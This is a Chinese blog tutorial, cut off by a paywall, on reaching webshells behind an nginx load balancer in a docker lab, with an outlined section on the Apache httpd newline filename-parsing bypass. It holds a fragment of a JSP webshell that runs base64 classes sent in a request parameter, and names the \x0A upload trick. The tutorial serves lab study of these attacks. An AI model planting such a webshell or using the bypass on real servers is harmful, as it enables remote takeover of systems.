负载均衡下的webshell连接+apachehttpd换行解析漏洞

已于 2023-02-09 22:47:14 修改
阅读量245 收藏
点赞数
文章标签: 负载均衡 运维 服务器
于 2023-02-09 21:46:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68390300/article/details/128944426
版权

目录

一.反向代理负载均衡

二. 环境搭建

2.1默认的「轮询」方式来做演示。

2.2启动环境(docker)

​编辑 2.3在蚁剑中添加shell

三.在反向代理情况下实现负载均衡上传webshell的难点

3.1我们需要在每一台节点的相同位置都上传相同内容的 WebShell

3.2执行命令时,无法知道下此的请求交给那台服务器执行 

 3.3上传工具不完整

3.4 目标机器不能出外网

四.解决方案

4.1 关掉一台机器

4.2在执行前判断IP(执行前判断要不要执行) 

4.3在web层做一次流量转发(完美)

五.Apache httpd换行解析漏洞

5.1编译运行漏洞环境

5.2上传一个名为1.php的文件,打开代理拦截

5.3发送到repeater模块,点击go发现文件上传失败

 5.4在1.php后面添加换行符\x0A

 5.5发现上传成功

一.反向代理负载均衡

反向代理方式其中比较流行的方式是用 nginx 来做负载均衡,实现负载均衡的方式有很多种,比如 DNS 方式、HTTP 重定向方式、IP 负载均衡方式、反向代理方式等等。

nginx常见策略: 

 url_hash和ip_hash只要IP和url地址不变,命中的服务器不会改变,可以保持长链接

二. 环境搭建

2.1默认的「轮询」方式来做演示。

github环境自取:https://github.com/AntSwordProject/AntSword-Labs

将文件下载下来上传至虚拟机中 

 nginx服务器反向代理到两个tomact服务器

Node1 和 Node2 均是 tomcat 8 ,在内网中开放了 8080 端口,我们在外部是没法直接访问到的 ,我们只能通过 nginx 这台机器访问,配置如下

2.2启动环境(docker)

[root@2023 AntSword-Labs-master]# ls -al
[root@2023 AntSword-Labs-master]# cd loadbalance
[root@2023 loadbalance]# cd loadbalance-jsp        //切换到老大balance目录
[root@2023 loadbalance-jsp]# systemctl start docker   //启动docker
[root@2023 loadbalance-jsp]# docker-compose up -d     //环境搭建
[root@2023 loadbalance-jsp]# docker ps -a             //查看
CONTAINER ID        IMAGE                      COMMAND                  CREATED             STATUS                      PORTS                               NAMES
525a0cc657a5        nginx:1.17                 "nginx -g 'daemon of…"   11 seconds ago      Up 10 seconds               0.0.0.0:18080->80/tcp               loadbalance-jsp_nginx_1
9ff245f052e6        loadbalance-jsp_lbsnode1   "catalina.sh run"        11 seconds ago      Up 11 seconds               8080/tcp                            loadbalance-jsp_lbsnode1_1
cc168aa146ea        loadbalance-jsp_lbsnode2   "catalina.sh run"        11 seconds ago      Up 11 seconds               8080/tcp                            loadbalance-jsp_lbsnode2_1
一个nginx服务器加两个tomacat服务器

 发现端口是18080,在本地访问,出现一下画面表示搭建成功

 2.3在蚁剑中添加shell

假设存在rce漏洞,类似于远程命令执行,可以让我们获取webshell,两台tamocat服务器上都存在ant.jsp,密码为ant,做负载均衡时,两个后端服务器代码是一致的

fineClass(b,0,b.length); }}%><% String cls=request.getParameter("ant");if(cls!=null){ new U(this.getClass().getClassLoader()).g(new sun.misc.BASE64Decoder().decodeBuffer(cls)).newInstance().equals(pageContext); }%>

 

 

三.在反向代理情况下实现负载均衡上传webshell的难点

3.1我们需要在每一台节点的相同位置都上传相同内容的 WebShell

轮询方式,按顺序上传,我们需要多上传几次,保证每一台后端服务器都可以上传到webshell,一旦有一台机器上没有࿰

最低0.47元/天 解锁文章
m0_68390300
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【中间件漏洞Apache HTTPD 漏洞全集复现(基于Vulhub平台)
Continuejww的博客
09-11 794
①CVE-2017-15715 ②多后缀解析漏洞 ③远程命令执行漏洞 ④CVE-2021-41773 ⑤CVE-2021-42013 ⑥CVE-2021-40438
Apache httpd 解析漏洞
xiwangyizhicunzai的博客
10-23 4497
Apache HTTPD 换行解析漏洞(CVE-2017-15715) apache通过mod_php来运行脚本,其2.4.0-2.4.29中存在apache换行解析漏洞,在解析php时xxx.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。 docker-compose exec apache bash 这个很奇怪,一进去一片空白,一看源码才知道只有后端,没有前端,意思...
负载均衡下的webshell连接
weixin_71514466的博客
01-29 563
1.关闭其中一台服务器。2.web层做流量转发。
负载均衡下的webshell上传
qtttgeq的博客
04-12 245
## 架构如下``````### 实验假定业务中存在RCE漏洞,上传了 WebShell 之后, 因为负载均衡的存在, 导致后续上传的工具、执行命令等操作出现不连续的情况。演示环境中, LBSNode1 和 LBSNode2 均存在位置相同的 Shell: ant.jsp1. 启动环境``````Shell | 密码 | 编码器无法直接连接内网中的两台 node, 只能通过 nginx LBS 去连接!
vulhub-httpd-apache_parsing_vulnerability
Ronin_qianmo的博客
07-27 403
1、漏洞描述 在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。 2、漏洞原理 Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。比如,如下配置文件: AddType text/html .html AddLanguage zh-CN .cn 其给.html后缀增加了media-type,值为text/html;给.cn后缀增加了语言,值为zh-CN。此时,如果用户请求文
CTF-web 第十部分 webshell基础与免杀
热门推荐
iamsongyu的博客
11-15 1万+
一、什么是webshell (1)webshell简介         webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载...
网络安全-负载均衡下的webshell连接
01-26
当我们在负载均衡环境下讨论webshell连接时,这意味着我们要探讨的是如何在分布式系统中管理和防范恶意的webshell活动。 Webshell,通常指的是黑客在目标服务器上留下的后门程序,它允许攻击者通过Web接口远程控制...
Apache后缀名解析漏洞分析和防御方法
01-20
但是大家可能不知道的是,apache服务器也存在类似的解析漏洞。 我们来做下实验,我在本地搭建好了一个apache+php的测试平台: 两个文件phpinfo.php phpinfo.php.a ,我们来访问下phpinfo.php.a: ...
基于机器学习的 Webshell 检测+源代码+文档说明
11-09
本课题旨在研究机器学习在 Webshell 检测中的应用,以目前应用广泛的服务器端语言 PHP 为例,通过学习和研究 PHP Webshell 在检测中的对抗手段,收集充分的黑白样本用于机器学习模型训练,采用较为有效的方式进行...
webshell连接工具skyscorpionV1.0.beta39.20210126.zip
04-27
Webshell连接工具Skyscorpion V1.0.beta39.20210126.zip是一款专门针对Web安全领域的实用工具,主要用于管理和控制已植入的WebshellWebshell通常是在网站服务器上通过SQL注入、文件上传漏洞等攻击手段留下的后门,...
智能负载均衡:如何在Eureka中配置服务的权重分配
2401_85763639的博客
07-18 891
服务权重分配是一种负载均衡策略,它允许在多个服务实例之间分配不同的请求比例。通过为每个服务实例分配一个权重,可以控制每个实例接收的请求数量。性能差异:不同服务实例的性能可能不同,权重分配可以确保高性能实例处理更多请求。故障恢复:在某些实例出现问题时,降低其权重可以减少其接收的请求量,从而降低系统的整体影响。流量控制:在进行A/B测试或金丝雀发布时,可以通过权重分配控制不同版本的流量。最后,需要在客户端配置中集成自定义负载均衡器。
从零手写实现 nginx-31-load balance 负载均衡介绍
07-17 833
大家好,我是老马。很高兴遇到你。我们为 java 开发者实现了 java 版本的 nginx如果你想知道 servlet 如何处理的,可以参考我的另一个项目:手写从零实现简易版 tomcatminicatNginx 负载均衡的目标是通过均匀分配请求,确保每台服务器(大厨)都不至于过载,从而提升整体系统的效率和可靠性。这样,每个顾客都能更快地得到服务,整个餐馆的运营也更加顺畅。Nginx 提供了多种负载均衡算法,包括轮询、权重轮询、最少连接、IP 哈希和一致性哈希。
负载均衡轮询逻辑
weixin_41011482的博客
07-17 537
轮询逻辑
分布式存储Ceph的部署及应用(创建MDS、RBD、RGW 接口)
weixin_44112402的博客
07-17 804
存储机制会把数据分散存储到多个节点上,具有高扩展性、高性能、高可用性等优点。Ceph使用C++语言开发,是一个开放、自我修复和自我管理的开源分布式存储系统。具有高扩展性、高性能、高可靠性的优点。Ceph目前已得到众多云计算厂商的支持并被广泛应用。RedHat及OpenStack,Kubernetes都可与Ceph整合以支持虚拟机镜像的后端存储。粗略估计,我国70%—80%的云平台都将Ceph作为底层的存储平台,由此可见Ceph俨然成为了开源云平台的标配。
Langchain-Chatchat3.1版本docker部署流程——知识库问答
最新发布
qq_38531623的博客
07-18 287
langchain-chatchat3.1 docker部署 知识库问答篇
7.17(nodejs、vue、SSH服务、SSH免密登录)
m0_71589190的博客
07-17 1082
nodejs、vue、SSH服务、SSH免密登录
9,SSH sftp 命令
sagima_sdu的博客
07-16 190
是 SSH 提供的一个客户端应用程序,主要用来安全地访问 FTP。因为 FTP 是不加密协议,很不安全,FTP 的提示符下面,就可以输入各种 FTP 命令了,这部分完全跟传统的 FTP 用法完全一样。执行上面的命令,会要求输入 FTP 的密码。密码验证成功以后,就会出现 FTP 的提示符。就相当于将 FTP 放入了 SSH。下面的命令连接 FTP 主机。
5,SSH 端口转发
sagima_sdu的博客
07-16 744
SSH 除了登录服务器,还有一大用途,就是作为加密通信的中介,充当两台服务器之间的通信加密跳板,使得原本不加密的通信变成加密通信。这个功能称为端口转发(port forwarding),又称 SSH 隧道(tunnel)。端口转发有两个主要作用:(1)将不加密的数据放在 SSH 安全连接里面传输,使得原本不安全的网络服务增加了安全性,比如通过端口转发访问 Telnet、FTP 等明文服务,数据传输就都会加密。(2)作为数据通信的加密跳板,绕过网络防火墙。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值